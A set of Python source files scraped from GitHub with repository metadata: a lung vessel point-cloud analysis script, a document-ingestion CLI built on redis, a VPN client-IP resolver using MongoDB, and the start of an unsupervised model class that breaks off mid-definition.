# process = subprocess.Popen(bashCommand, stdout=subprocess.PIPE, shell=True)
# process.wait()
sys.path.insert(0, os.path.abspath("../../../.."))
from copy import deepcopy
import numpy as np
import torch
import pyvista as pv
import matplotlib.pyplot as plt
from shapmagn.global_variable import Shape, shape_type
from shapmagn.datasets.data_utils import read_json_into_list, get_obj, get_file_name
from shapmagn.shape.shape_pair_utils import create_shape_pair
from shapmagn.utils.obj_factory import obj_factory
from shapmagn.utils.visualizer import (
visualize_point_fea,
visualize_point_pair,
visualize_multi_point,
)
from shapmagn.utils.local_feature_extractor import *
def get_pair(source_path, target_path, expand_bch_dim=True, return_tensor=True):
get_obj_func = get_obj(
reader_obj,
normalizer_obj,
sampler_obj,
device,
expand_bch_dim=expand_bch_dim,
return_tensor=return_tensor,
)
source_obj, source_interval = get_obj_func(source_path)
target_obj, target_interval = get_obj_func(target_path)
return source_obj, target_obj
def plot_pair_weight_distribution(
source_weight, target_weight, use_log=False, title="", show=True, save_path=None
):
plt.style.use("bmh")
fig, ax = plt.subplots()
source_weight = np.log(source_weight) if use_log else source_weight
target_weight = np.log(target_weight) if use_log else target_weight
ax.hist(source_weight, bins=1000, density=0, histtype="stepfilled", alpha=0.7)
ax.hist(target_weight, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
title += "weight" if not use_log else "log_weight"
ax.set_title(title)
if show:
plt.show()
if save_path:
plt.savefig(save_path, dpi=300)
plt.clf()
def plot_pair_weight_distribution_before_and_after_radius_matching(
source_weight1,
target_weight1,
source_weight2,
target_weight2,
use_log=False,
title="",
show=True,
save_path=None,
):
plt.style.use("bmh")
fig, axes = plt.subplots(nrows=2, ncols=2)
ax0, ax1, ax2, ax3 = axes.flatten()
source_weight_matched1 = matching_np_radius(source_weight1, target_weight1)
smw_sum1, sw_sum1, tp_sum1 = (
source_weight_matched1.sum(),
source_weight1.sum(),
target_weight1.sum(),
)
source_weight1 = np.log(source_weight1) if use_log else source_weight1
target_weight1 = np.log(target_weight1) if use_log else target_weight1
ax0.hist(source_weight1, bins=1000, density=0, histtype="stepfilled", alpha=0.7)
ax0.hist(target_weight1, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax0.set_title("sw_sum: {:.3f}, tp_sum:{:.3f}".format(sw_sum1, tp_sum1), fontsize=10)
source_weight_matched1_norm = (
np.log(source_weight_matched1) if use_log else source_weight_matched1
)
ax1.hist(
source_weight_matched1_norm,
bins=1000,
density=0,
histtype="stepfilled",
alpha=0.7,
)
ax1.hist(target_weight1, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax1.set_title(
"smw_sum: {:.3f}, tp_sum:{:.3f}".format(smw_sum1, tp_sum1), fontsize=10
)
source_weight_matched2 = matching_np_radius(source_weight2, target_weight2)
smw_sum2, sw_sum2, tp_sum2 = (
source_weight_matched2.sum(),
source_weight2.sum(),
target_weight2.sum(),
)
source_weight2 = np.log(source_weight2) if use_log else source_weight2
target_weight2 = np.log(target_weight2) if use_log else target_weight2
ax2.hist(source_weight2, bins=1000, density=0, histtype="stepfilled", alpha=0.7)
ax2.hist(target_weight2, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax2.set_title("sw_sum: {:.3f}, tp_sum:{:.3f}".format(sw_sum2, tp_sum2), fontsize=10)
source_weight_matched2_norm = (
np.log(source_weight_matched2) if use_log else source_weight_matched2
)
ax3.hist(
source_weight_matched2_norm,
bins=1000,
density=0,
histtype="stepfilled",
alpha=0.7,
)
ax3.hist(target_weight2, bins=1000, density=0, histtype="stepfilled", alpha=0.5)
ax3.set_title(
"smw_sum: {:.3f}, tp_sum:{:.3f}".format(smw_sum2, tp_sum2), fontsize=10
)
fig.subplots_adjust(hspace=0.3)
fig.suptitle(title)
if show:
plt.show()
if save_path:
plt.savefig(save_path, dpi=300)
plt.clf()
return source_weight_matched1, source_weight_matched2
def get_half_lung(lung, normalize_weight=False):
weights = lung.weights.detach()
points = lung.points.detach()
pos_filter = points[..., 0] < 0
points = points[pos_filter][None]
weights = weights[pos_filter][None]
weights = weights
weights = weights / weights.sum() if normalize_weight else weights
half_lung = Shape()
half_lung.set_data(points=points, weights=weights)
return half_lung
def get_key_vessel(lung, thre=2e-05):
weights = lung.weights.detach()
points = lung.points.detach()
mask = (lung.weights > thre)[..., 0]
weights = weights[mask][None]
points = points[mask][None]
key_lung = Shape()
key_lung.set_data(points=points, weights=weights)
return key_lung
def sampled_via_radius(source, target):
min_npoints = min(source.npoints, target.npoints)
tw = target.weights.squeeze()
sw = source.weights.squeeze()
t_sorted, t_indices = torch.sort(tw, descending=True)
s_sorted, s_indices = torch.sort(sw, descending=True)
t_sampled_indices = t_indices[:min_npoints]
s_sampled_indices = s_indices[:min_npoints]
tp_sampled = target.points[:, t_sampled_indices]
sp_sampled = source.points[:, s_sampled_indices]
tw_sampled = target.weights[:, t_sampled_indices]
sw_sampled = source.weights[:, s_sampled_indices]
target_sampled, source_sampled = Shape(), Shape()
target_sampled.set_data(points=tp_sampled, weights=tw_sampled)
source_sampled.set_data(points=sp_sampled, weights=sw_sampled)
return source_sampled, target_sampled
def hist_match(source, template):
"""
Adjust the pixel values of a grayscale image such that its histogram
matches that of a target image.
Code adapted from
http://stackoverflow.com/questions/32655686/histogram-matching-of-two-images-in-python-2-x
Arguments:
-----------
source: np.ndarray
Image to transform; the histogram is computed over the flattened
array
template: np.ndarray
Template image; can have different dimensions to source
Returns:
-----------
matched: np.ndarray
The transformed output image
"""
oldshape = source.shape
source = source.ravel()
template = template.ravel()
# get the set of unique pixel values and their corresponding indices and
# counts
s_values, bin_idx, s_counts = np.unique(
source, return_inverse=True, return_counts=True
)
t_values, t_counts = np.unique(template, return_counts=True)
# take the cumsum of the counts and normalize by the number of pixels to
# get the empirical cumulative distribution functions for the source and
# template images (maps pixel value --> quantile)
s_quantiles = np.cumsum(s_counts).astype(np.float64)
s_quantiles /= s_quantiles[-1]
t_quantiles = np.cumsum(t_counts).astype(np.float64)
t_quantiles /= t_quantiles[-1]
# interpolate linearly to find the pixel values in the template image
# that correspond most closely to the quantiles in the source image
interp_t_values = np.interp(s_quantiles, t_quantiles, t_values)
return interp_t_values[bin_idx].reshape(oldshape)
def matching_np_radius(source_weights, target_weights):
"""
:param source_weights: Nx1
:param target_weights: Mx1
:param matched_weights: Nx1
:return:
"""
ns = source_weights.shape[0]
sw = source_weights.squeeze()
tw = target_weights.squeeze()
range = [min(sw.min(), tw.min()), max(sw.max(), tw.max())]
resol = 10000
interp = (range[1] - range[0]) / resol
bins = np.linspace(range[0] - 2 * interp, range[1] + 2 * interp, resol)
sw_indice = np.digitize(sw, bins, right=False)
tw_indice = np.digitize(tw, bins, right=False)
sw_digitize = bins[sw_indice]
tw_digitize = bins[tw_indice]
sw_transformed = hist_match(sw_digitize, tw_digitize)
return sw_transformed.reshape(ns, 1).astype(np.float32)
def matching_shape_radius(source, target, sampled_by_radius=False, show=True):
if sampled_by_radius:
source, target = sampled_via_radius(source, target)
device = source.points.device
sn = source.npoints
tn = target.npoints
sw = source.weights.squeeze().cpu().numpy()
tw = target.weights.squeeze().cpu().numpy()
range = [min(sw.min(), tw.min()), max(sw.max(), tw.max())]
resol = 10000
interp = (range[1] - range[0]) / resol
bins = np.linspace(range[0] - 2 * interp, range[1] + 2 * interp, resol)
sw_indice = np.digitize(sw, bins, right=False)
tw_indice = np.digitize(tw, bins, right=False)
sw_digitize = bins[sw_indice]
tw_digitize = bins[tw_indice]
sw_transformed = hist_match(sw_digitize, tw_digitize)
if show:
plot_pair_weight_distribution(sw_digitize, tw_digitize, use_log=True)
plot_pair_weight_distribution(sw_transformed, tw_digitize, use_log=True)
visualize_point_pair(
source.points,
target.points,
source.weights,
target.weights,
title1="source(before)",
title2="target(before)",
)
visualize_point_pair(
source.points,
target.points,
sw_transformed,
tw_digitize,
title1="source(after)",
title2="target(after)",
)
source.weights = (
torch.tensor(sw_transformed.astype(np.float32)).to(device).view(1, sn, 1)
)
target.weights = (
torch.tensor(tw_digitize.astype(np.float32)).to(device).view(1, tn, 1)
)
return source, target
def source_weight_transform(weights, compute_on_half_lung=False):
weights = weights * 1
weights_cp = deepcopy(weights)
thre = 1.9e-05
thre = thre # if not compute_on_half_lung else thre*2
weights[weights_cp < thre] = 1e-7
return weights
def flowed_weight_transform(weights, compute_on_half_lung=False):
weights = weights * 1
weights_cp = deepcopy(weights)
thre = 1.9e-05
thre = thre # if not compute_on_half_lung else thre * 2
weights[weights_cp < thre] = 1e-7
return weights
def target_weight_transform(weights, compute_on_half_lung=False):
weights = weights * 1
weights_cp = deepcopy(weights)
thre = 1.9e-05
thre = thre # if not compute_on_half_lung else thre * 2
weights[weights_cp < thre] = 1e-7
# weights[weights_cp > 1.1e-05] = 1e-7
return weights
def pair_shape_transformer(init_thres=2.9e-5, nstep=5):
# todo the next step of the transformer is to return a smoothed mask to constrain the movement of the lung
def transform(source, target, cur_step):
min_weights = min(torch.min(source.weights), torch.min(target.weights))
max_weights = min(torch.max(source.weights), torch.max(target.weights))
max_weights = max_weights.item()
cur_step = cur_step.item()
assert init_thres > min_weights
thres = init_thres - (init_thres - min_weights) / nstep * cur_step
s_weights = source.weights.clone()
t_weights = target.weights.clone()
s_weights[source.weights < thres] = 1e-7
t_weights[target.weights < thres] = 1e-7
s_transformed, t_transformed = Shape(), Shape()
s_transformed.set_data(
points=source.points, weights=s_weights, pointfea=source.pointfea
)
t_transformed.set_data(
points=target.points, weights=t_weights, pointfea=target.pointfea
)
print("the weight of the lung pair are updated")
return s_transformed, t_transformed
return transform
def capture_plotter(save_source=False):
from shapmagn.utils.visualizer import visualize_point_pair_overlap
inner_count = 0
def save(record_path, name_suffix, shape_pair):
nonlocal inner_count
source, flowed, target = shape_pair.source, shape_pair.flowed, shape_pair.target
for sp, fp, tp, sw, fw, tw, pair_name in zip(
source.points,
flowed.points,
target.points,
source.weights,
flowed.weights,
target.weights,
pair_name_list,
):
if inner_count == 0 or save_source:
path = os.path.join(
record_path, "source_target" + "_" + name_suffix + ".png"
)
visualize_point_pair_overlap(
sp,
tp,
flowed_weight_transform(fw, True),
target_weight_transform(tw, True),
title1="source",
title2="target",
rgb_on=False,
saving_capture_path=path,
show=False,
)
path_1 = os.path.join(
record_path,
pair_name + "_flowed_target" + "_main_" + name_suffix + ".png",
)
path_2 = os.path.join(
record_path,
pair_name + "_flowed_target" + "_whole_" + name_suffix + ".png",
)
visualize_point_pair_overlap(
fp,
tp,
flowed_weight_transform(fw, True),
target_weight_transform(tw, True),
title1="flowed",
title2="target",
rgb_on=False,
saving_capture_path=path_1,
show=False,
)
visualize_point_pair_overlap(
fp,
tp,
fw,
tw,
title1="flowed",
title2="target",
rgb_on=False,
saving_capture_path=path_2,
show=False,
)
inner_count += 1
return save
def lung_isolated_leaf_clean_up(
lung, radius=0.032, principle_weight=None, normalize_weights=True
):
points = lung.points.detach()
weights = lung.weights.detach()
mass, dev, cov = compute_local_moments(points, radius=radius)
eigenvector_main = compute_local_fea_from_moments(
"eigenvector_main", weights, mass, dev, cov
)
filter = mass[..., 0].squeeze() > 2
to_remove = ~filter
print(
"In the first step, num of points are removed {}, {}".format(
torch.sum(to_remove), torch.sum(to_remove) / len(filter)
)
)
points_toremove = points[:, to_remove]
mass_toremove = mass[:, to_remove]
mass = mass[:, filter]
points = points[:, filter]
weights = weights[:, filter]
eigenvector_main = eigenvector_main[:, filter]
visualize_point_fea_with_arrow(points, mass, eigenvector_main * 0.01, rgb_on=False)
visualize_point_overlap(
points,
points_toremove,
mass,
mass_toremove,
title="cleaned points",
point_size=(10, 20),
rgb_on=False,
opacity=("linear", 1.0),
)
Gamma = compute_anisotropic_gamma_from_points(
points,
cov_sigma_scale=radius,
aniso_kernel_scale=radius,
principle_weight=principle_weight,
)
mass, dev, cov = compute_aniso_local_moments(points, Gamma)
eigenvector_main = compute_local_fea_from_moments(
"eigenvector_main", weights, mass, dev, cov
)
filter = mass[..., 0].squeeze() > 2.5
to_remove = ~filter
print(
"In the second step, num of points are removed {}, {}".format(
torch.sum(to_remove), torch.sum(to_remove) / len(filter)
)
)
points_toremove = points[:, to_remove]
mass_toremove = mass[:, to_remove]
mass = mass[:, filter]
points = points[:, filter]
weights = weights[:, filter]
eigenvector_main = eigenvector_main[:, filter]
visualize_point_fea_with_arrow(points, mass, eigenvector_main * 0.01, rgb_on=False)
visualize_point_overlap(
points,
points_toremove,
mass,
mass_toremove,
title="cleaned points",
point_size=(10, 20),
rgb_on=False,
opacity=("linear", 1.0),
)
Gamma = compute_anisotropic_gamma_from_points(
points,
cov_sigma_scale=radius,
aniso_kernel_scale=radius,
principle_weight=principle_weight,
)
mass, dev, cov = compute_aniso_local_moments(points, Gamma)
eigenvector_main = compute_local_fea_from_moments(
"eigenvector_main", weights, mass, dev, cov
)
filter = mass[..., 0].squeeze() > 3
to_remove = ~filter
print(
"In the third step, num of points are removed {}, {}".format(
torch.sum(to_remove), torch.sum(to_remove) / len(filter)
)
)
points_toremove = points[:, to_remove]
mass_toremove = mass[:, to_remove]
mass = mass[:, filter]
points = points[:, filter]
weights = weights[:, filter]
eigenvector_main = eigenvector_main[:, filter]
visualize_point_fea_with_arrow(points, mass, eigenvector_main * 0.01, rgb_on=False)
visualize_point_overlap(
points,
points_toremove,
mass,
mass_toremove,
title="cleaned points",
point_size=(10, 20),
rgb_on=False,
opacity=("linear", 1.0),
)
cleaned_lung = Shape()
cleaned_lung.points, cleaned_lung.weights = (
points,
weights / torch.sum(weights) if normalize_weights else weights,
)
return cleaned_lung
def analysis_large_vessel(
source,
target,
source_weight_transform=source_weight_transform,
target_weight_transform=target_weight_transform,
title1="source",
title2="target",
):
source_points, source_weights, = (
source.points.detach().cpu(),
source.weights.detach().cpu(),
)
target_points, target_weights, = (
target.points.detach().cpu(),
target.weights.detach().cpu(),
)
plot_pair_weight_distribution(
source_weight_transform(source_weights).squeeze().numpy(),
target_weight_transform(target_weights).squeeze().numpy(),
use_log=True,
)
visualize_point_pair(
source_points,
target_points,
source_weight_transform(source_weights),
target_weight_transform(target_weights),
title1=title1,
title2=title2,
)
def compute_atlas(weight_list):
atlas_weight = np.concatenate(weight_list)
return atlas_weight
def transfer_radius_and_save_sample(
cur_obj, atlas_distri, radius_transfered_saing_path
):
cur_obj["weights"] = matching_np_radius(cur_obj["weights"], atlas_distri)
data = pv.PolyData(cur_obj["points"])
for key, item in cur_obj.items():
if key not in ["points"]:
data.point_arrays[key] = item
data.save(radius_transfered_saing_path)
return cur_obj
if __name__ == "__main__":
assert (
shape_type == "pointcloud"
), "set shape_type = 'pointcloud' in global_variable.py"
device = torch.device("cpu") # cuda:0 cpu
reader_obj = "lung_dataloader_utils.lung_reader()"
normalizer_obj = (
"lung_dataloader_utils.lung_normalizer(weight_scale=60000,scale=[100,100,100])"
)
phase = "train"
use_local_mount = False
remote_mount_transfer = lambda x: x.replace(
"/playpen-raid1", "/home/zyshen/remote/llr11_mount"
)
path_transfer = (
(lambda x: remote_mount_transfer(x)) if use_local_mount else (lambda x: x)
)
dataset_json_path = (
"/playpen-raid1/zyshen/data/lung_expri/{}/pair_data.json".format(phase)
)
dataset_json_path = path_transfer(dataset_json_path)
sampler_obj = "lung_dataloader_utils.lung_sampler( method='voxelgrid',scale=0.0003)"
get_obj_func = get_obj(
reader_obj,
normalizer_obj,
sampler_obj,
device,
expand_bch_dim=False,
return_tensor=False,
)
altas_path = "/playpen-raid1/Data/UNC_vesselParticles/10067M_INSP_STD_MSM_COPD_wholeLungVesselParticles.vtk"
altas_path = path_transfer(altas_path)
atlas, _ = get_obj_func(altas_path)
sampler_obj = "lung_dataloader_utils.lung_sampler( method='combined',scale=0.0003,num_sample=30000,sampled_by_weight=True)"
get_obj_func = get_obj(
reader_obj,
normalizer_obj,
sampler_obj,
device,
expand_bch_dim=False,
return_tensor=False,
)
sampled_atlas, _ = get_obj_func(altas_path)
radius_transfered_saing_path = "/playpen-raid1/zyshen/data/lung_atlas/{}".format(
phase
)
radius_transfered_saing_path = path_transfer(radius_transfered_saing_path)
os.makedirs(radius_transfered_saing_path, exist_ok=True)
pair_name_list, pair_info_list = read_json_into_list(dataset_json_path)
pair_path_list = [
[pair_info["source"]["data_path"], pair_info["target"]["data_path"]]
for pair_info in pair_info_list
]
pair_id = 3
output_path = "/playpen-raid1/zyshen/data/lung_data_analysis/val"
for pair_id in range(len(pair_name_list)):
pair_path = pair_path_list[pair_id]
pair_path = [path_transfer(path) for path in pair_path]
sampler_obj = (
"lung_dataloader_utils.lung_sampler( method='voxelgrid',scale=0.0003)"
)
########################
plot_saving_path = os.path.join(radius_transfered_saing_path, "origin_plots")
os.makedirs(plot_saving_path, exist_ok=True)
source_path, target_path = pair_path_list[pair_id]
source, target = get_pair(
source_path, target_path, expand_bch_dim=False, return_tensor=False
)
saving_path = os.path.join(plot_saving_path, pair_name_list[pair_id] + ".png")
camera_pos = [
(-4.924379645467042, 2.17374925796456, 1.5003730890759344),
(0.0, 0.0, 0.0),
(0.40133888001174545, 0.31574165540339943, 0.8597873634998591),
]
visualize_point_pair(
source["points"],
target["points"],
source["weights"],
target["weights"],
title1="source",
title2="target",
saving_capture_path=saving_path,
camera_pos=camera_pos,
show=False,
)
plot_saving_path = os.path.join(radius_transfered_saing_path, "plots")
os.makedirs(plot_saving_path, exist_ok=True)
# vtk_saving_path = os.path.join(radius_transfered_saing_path,"data")
# os.makedirs(vtk_saving_path,exist_ok=True)
# saving_path = os.path.join(vtk_saving_path,get_file_name(source_path)+".vtk")
# mapped_source = transfer_radius_and_save_sample(source, atlas["weights"], saving_path)
# saving_path = os.path.join(vtk_saving_path,get_file_name(target_path)+".vtk")
# mapped_target = transfer_radius_and_save_sample(target, atlas["weights"], saving_path)
# plot_saving_path = os.path.join(radius_transfered_saing_path, "plots")
# source_vg_weight, target_vg_weight = source["weights"], target["weights"]
# sampler_obj ="lung_dataloader_utils.lung_sampler( method='combined',scale=0.0003,num_sample=30000,sampled_by_weight=True)"
# source, target = get_pair(source_path, target_path, expand_bch_dim=False, return_tensor=False)
# source_combined_weight, target_combined_weight = source["weights"], target["weights"]
# os.makedirs(plot_saving_path,exist_ok=True)
# saving_file_path = os.path.join(plot_saving_path,pair_info_list[pair_id]["source"]["name"]+"_weights_distribution.png")
# title = pair_info_list[pair_id]["source"]["name"] + "_" +"n_sp:{} ".format(len(source_vg_weight))+"n_tp:{}".format(len(atlas["weights"]))
# _,source_combined_mapped_weight =plot_pair_weight_distribution_before_and_after_radius_matching(source_vg_weight, atlas["weights"],source_combined_weight,sampled_atlas["weights"], use_log=True,title=title,show=False,save_path=saving_file_path)
# saving_file_path = os.path.join(plot_saving_path, pair_info_list[pair_id]["target"]["name"] + "_weights_distribution.png")
# title = pair_info_list[pair_id]["target"]["name"] + "_" + "n_sp:{} ".format(len(target_vg_weight)) + "n_tp:{}".format(len(atlas["weights"]))
# _,target_combined_mapped_weight =plot_pair_weight_distribution_before_and_after_radius_matching(target_vg_weight, atlas["weights"], target_combined_weight, sampled_atlas["weights"],use_log=True, title=title, show=False,save_path=saving_file_path)
# saving_path = os.path.join(plot_saving_path, pair_name_list[pair_id]+"_mapped.png")
# camera_pos = [(-4.924379645467042, 2.17374925796456, 1.5003730890759344), (0.0, 0.0, 0.0),
# (0.40133888001174545, 0.31574165540339943, 0.8597873634998591)]
# visualize_point_pair(source["points"], target["points"],
# source_combined_mapped_weight,
# target_combined_mapped_weight,
# title1="source", title2="target", rgb_on=False,saving_capture_path=saving_path,camera_pos=camera_pos,show=False )
# source, target = get_pair(*pair_path)
# source_vg_weight, target_vg_weight = source["weights"], target["weights"]
# title = pair_name_list[pair_id] + "_" +"n_sp:{} ".format(len(source_vg_weight))+"n_tp:{}".format(len(target_vg_weight))
# sampler_obj ="lung_dataloader_utils.lung_sampler( method='combined',scale=0.0003,num_sample=30000,sampled_by_weight=True)"
# source, target = get_pair(source_path, target_path, expand_bch_dim=False, return_tensor=False)
# source_combined_weight, target_combined_weight = source["weights"], target["weights"]
# plot_saving_path = os.path.join(radius_transfered_saing_path,"plots")
# saving_folder_path = os.path.join(output_path,pair_name_list[pair_id])
# os.makedirs(saving_folder_path,exist_ok=True)
# saving_file_path = os.path.join(saving_folder_path,pair_name_list[pair_id]+"_weights_distribution.png")
# plot_pair_weight_distribution_before_and_after_radius_matching(source_vg_weight, target_vg_weight,source_combined_weight,target_combined_weight, use_log=True,title=title,show=False,save_path=saving_file_path)
#
# visualize_point_pair(source["points"], target["points"],
# source["weights"],
# target["weights"],
# title1="source", title2="target", rgb_on=False)
#
#
# shape_pair = create_shape_pair(source, target)
# source_half = get_half_lung(source)
# target_half = get_half_lung(target)
# cleaned_source_half = lung_isolated_leaf_clean_up(source_half,radius=0.02, principle_weight=[2,1,1], normalize_weights=False)
# # visualize_point_pair(source_half.points, cleaned_source_half.points,
# # source_weight_transform(source_half.weights),
# # source_weight_transform(cleaned_source_half.weights),
# # title1="source", title2="cleaned_source", rgb_on=False)
# #
# # plot_pair_weight_distribution(source_weight_transform(source_half.weights).cpu().squeeze().numpy(),
# # target_weight_transform(target_half.weights).cpu().squeeze().numpy(),
# # use_log=True)
#
# visualize_point_pair(source_half.points, target_half.points,
# source_weight_transform(source_half.weights),
# target_weight_transform(target_half.weights),
# title1="source", title2="target", rgb_on=False)
|
uncbiag/shapmagn
|
shapmagn/experiments/datasets/lung/lung_data_analysis.py
|
lung_data_analysis.py
|
py
| 28,299 |
python
|
en
|
code
| 94 |
github-code
|
6
|
6460552932
|
import sys
import click
import logging
from pprint import pprint
from ftmstore import get_dataset
from servicelayer.cache import get_redis, get_fakeredis
from servicelayer.logs import configure_logging
from servicelayer.jobs import Job, Dataset
from servicelayer import settings as sl_settings
from servicelayer.archive.util import ensure_path
from ingestors import settings
from ingestors.manager import Manager
from ingestors.directory import DirectoryIngestor
from ingestors.analysis import Analyzer
from ingestors.worker import IngestWorker, OP_ANALYZE, OP_INGEST
log = logging.getLogger(__name__)
STAGES = [OP_ANALYZE, OP_INGEST]
@click.group()
def cli():
configure_logging(level=logging.DEBUG)
@cli.command()
@click.option("-s", "--sync", is_flag=True, default=False, help="Run without threads")
def process(sync):
"""Start the queue and process tasks as they come. Blocks while waiting"""
num_threads = None if sync else sl_settings.WORKER_THREADS
worker = IngestWorker(stages=STAGES, num_threads=num_threads)
code = worker.run()
sys.exit(code)
@cli.command()
@click.argument("dataset")
def cancel(dataset):
"""Delete scheduled tasks for given dataset"""
conn = get_redis()
Dataset(conn, dataset).cancel()
@cli.command()
def killthekitten():
"""Completely kill redis contents."""
conn = get_redis()
conn.flushall()
def _ingest_path(db, conn, dataset, path, languages=[]):
context = {"languages": languages}
job = Job.create(conn, dataset)
stage = job.get_stage(OP_INGEST)
manager = Manager(db, stage, context)
path = ensure_path(path)
if path is not None:
if path.is_file():
entity = manager.make_entity("Document")
checksum = manager.store(path)
entity.set("contentHash", checksum)
entity.make_id(checksum)
entity.set("fileName", path.name)
log.info("Queue: %r", entity.to_dict())
manager.queue_entity(entity)
if path.is_dir():
DirectoryIngestor.crawl(manager, path)
manager.close()
@cli.command()
@click.option("--languages", multiple=True, help="3-letter language code (ISO 639)")
@click.option("--dataset", required=True, help="Name of the dataset")
@click.argument("path", type=click.Path(exists=True))
def ingest(path, dataset, languages=None):
"""Queue a set of files for ingest."""
conn = get_redis()
db = get_dataset(dataset, OP_INGEST)
_ingest_path(db, conn, dataset, path, languages=languages)
@cli.command()
@click.option("--dataset", required=True, help="Name of the dataset")
def analyze(dataset):
db = get_dataset(dataset, OP_ANALYZE)
analyzer = None
for entity in db.partials():
if analyzer is None or analyzer.entity.id != entity.id:
if analyzer is not None:
analyzer.flush()
# log.debug("Analyze: %r", entity)
analyzer = Analyzer(db, entity, {})
analyzer.feed(entity)
if analyzer is not None:
analyzer.flush()
@cli.command()
@click.option("--languages", multiple=True, help="3-letter language code (ISO 639)")
@click.argument("path", type=click.Path(exists=True))
def debug(path, languages=None):
"""Debug the ingest for the given path."""
conn = get_fakeredis()
settings.fts.DATABASE_URI = "sqlite:////tmp/debug.sqlite3"
db = get_dataset("debug", origin=OP_INGEST, database_uri=settings.fts.DATABASE_URI)
db.delete()
_ingest_path(db, conn, "debug", path, languages=languages)
worker = IngestWorker(conn=conn, stages=STAGES)
worker.sync()
for entity in db.iterate():
pprint(entity.to_dict())
if __name__ == "__main__":
cli()
|
alephdata/ingest-file
|
ingestors/cli.py
|
cli.py
|
py
| 3,714 |
python
|
en
|
code
| 45 |
github-code
|
6
|
5119440044
|
from netaddr import IPNetwork, IPAddress
import logging
from pymongo import MongoClient
logger = logging.getLogger( "ucn_logger" )
class VPNResolve(object):
def __init__( self, cidr, dbcfg):
self.logscollection = dbcfg['logscollection']
self.devicecollection = dbcfg['devicecollection']
self.db = dbcfg['db']
self.cidr = cidr
self.mc = MongoClient(dbcfg['host'], dbcfg['port'])
def clientip(self, request):
if len(request.access_route) > 1:
host = request.access_route[-1]
else:
host = request.access_route[0]
logger.debug("seen a client ip %s" % host)
if IPAddress(host) not in IPNetwork(self.cidr):
logger.debug("is not local, looking up in openvpn status")
return self.findlocal(host)
else:
return host
def findlocal(self, host):
db = self.mc[self.db]
devices = db[self.logscollection].find({"untrusted_client_ip": host}).sort("ts", -1).limit(1)
devicename = None
protocol = None
for device in devices:
devicename = device['common_name']
protocol = device['proto']
#now lookup device name in the devices collection
device = db[self.devicecollection].find_one({"login":devicename})
if device is not None:
if protocol is not None:
if protocol == "udp":
if 'vpn_udp_ip' in device:
logger.debug("retreived udp ip %s" % device['vpn_udp_ip'])
return device['vpn_udp_ip']
elif protocol == "tcp":
if 'vpn_tcp_ip' in device:
logger.debug("retreived tcp ip %s" % device['vpn_tcp_ip'])
return device['vpn_tcp_ip']
logger.debug("no corresponding ip for %s in db" % host)
return None
|
ucn-eu/ucnviz
|
vpnresolve.py
|
vpnresolve.py
|
py
| 1,620 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39629119175
|
import numpy as np
import glob
import os
import pandas as pd
from tqdm import tqdm
import nltk
import string
from nltk.tokenize import word_tokenize
import random
import pickle
from nltk.corpus import stopwords
from autocorrect import Speller
import re
from nltk.corpus import wordnet
from nltk.stem.wordnet import WordNetLemmatizer
from hyperopt import fmin, tpe, hp
# load a document
def load(filename):
file = open(filename, encoding='utf-8')
text = file.read()
file.close()
return text
# split a document into news story and highlights
def split(doc):
# find first highlight
index = doc.find('@highlight')
# split into story and highlights
story, highlights = doc[:index], doc[index:].split('@highlight')
# strip extra white space around each highlight
highlights = [h.strip() for h in highlights if len(h) > 0]
return story, highlights
# load all stories from a directory
def load_stories(directory):
stories = []
for name in os.listdir(directory):
filename = directory + '/' + name
# load document
doc = load(filename)
# split into story and highlights
story, highlights = split(doc)
# store
stories.append({'story':story, 'highlights':highlights})
return stories
directory = r'C:\Users\ymaha\Desktop\cnn\stories'
stories = load_stories(directory)
print('Loaded Stories %d' % len(stories))
def preprocesing(lines):
# function to convert nltk tag to wordnet tag
def nltk_tag_to_wordnet_tag(nltk_tag):
if nltk_tag.startswith('J'):
return wordnet.ADJ
elif nltk_tag.startswith('V'):
return wordnet.VERB
elif nltk_tag.startswith('N'):
return wordnet.NOUN
elif nltk_tag.startswith('R'):
return wordnet.ADV
else:
return None
def lemmatize_sentence(sentence):
#tokenize the sentence and find the POS tag for each token
nltk_tagged = nltk.pos_tag(nltk.word_tokenize(sentence))
#tuple of (token, wordnet_tag)
wordnet_tagged = map(lambda x: (x[0], nltk_tag_to_wordnet_tag(x[1])), nltk_tagged)
# print(wordnet_tagged)
lemmatized_sentence = []
for word, tag in wordnet_tagged:
if tag is None:
#if there is no available tag, append the token as is
lemmatized_sentence.append(word)
else:
#else use the tag to lemmatize the token
lemmatized_sentence.append(lemmatizer.lemmatize(word, tag))
# if tag is not None:
# lemmatized_sentence.append(lemmatizer.lemmatize(word, tag))
return " ".join(lemmatized_sentence)
temp = []
for line in lines:
# strip source cnn
index = line.find('(CNN)')
if index > -1:
line = line[index+len('(CNN)'):]
# tokenize on white space
line = line.split()
# convert to lower case
line = [word.lower() for word in line]
# remove punctuation and special characters from each token
line = [w.replace('[<>!#@$:.,%\?-_]+', ' ') for w in line]
# remove non ascii characters
line = [w.replace('[^\x00-\x7f]', ' ') for w in line]
# remove tokens with numbers in them
line = [word for word in line if word.isalpha()]
# # removing stop words
# line = [word for word in line if word not in stop_list]
# removing words of length 1
line = [word for word in line if len(word) > 1]
# # Lemmatizing the words and combing them into a line
# temp.append(lemmatize_sentence(' '.join(line)))
# Combining the words into a line
temp.append(' '.join(line))
# remove empty strings
temp = [c for c in temp if len(c) > 0]
return temp
stop_list = stopwords.words('english')
lemmatizer = WordNetLemmatizer()
stemmer = nltk.stem.PorterStemmer()
for i in tqdm(range(len(stories))):
# for example in stories:
stories[i]['story'] = preprocesing(stories[i]['story'].split('\n'))
stories[i]['highlights'] = preprocesing(stories[i]['highlights'])
# save to file
from pickle import dump
dump(stories, open('processed_cnn_data.pkl', 'wb'))
|
kalyankumarp/Abstractive-Text-Summarization-using-Transformers
|
Models/preprocess.py
|
preprocess.py
|
py
| 4,310 |
python
|
en
|
code
| 3 |
github-code
|
6
|
42479631473
|
"""Unsupervised Model scheleton."""
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from yadlt.core.model import Model
from yadlt.utils import tf_utils
class UnsupervisedModel(Model):
"""Unsupervised Model scheleton class.
The interface of the class is sklearn-like.
Methods
-------
* fit(): model training procedure.
* transform(): model inference procedure.
* reconstruct(): model reconstruction procedure (autoencoders).
* score(): model scoring procedure (mean error).
"""
def __init__(self, name):
"""Constructor."""
Model.__init__(self, name)
def fit(self, train_X, train_Y=None, val_X=None, val_Y=None, graph=None):
